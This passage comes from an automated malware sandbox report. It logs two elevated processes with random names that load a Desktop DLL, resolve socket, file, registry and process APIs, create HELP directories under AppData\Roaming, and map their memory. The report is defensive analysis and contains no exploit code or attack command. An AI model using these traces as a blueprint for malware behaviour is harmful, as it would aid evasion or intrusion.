1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97251 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #46: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #46 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xca4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x00497fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x005a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x011affff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013dffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97329 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #47: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcb0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x004c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x010effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013dffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
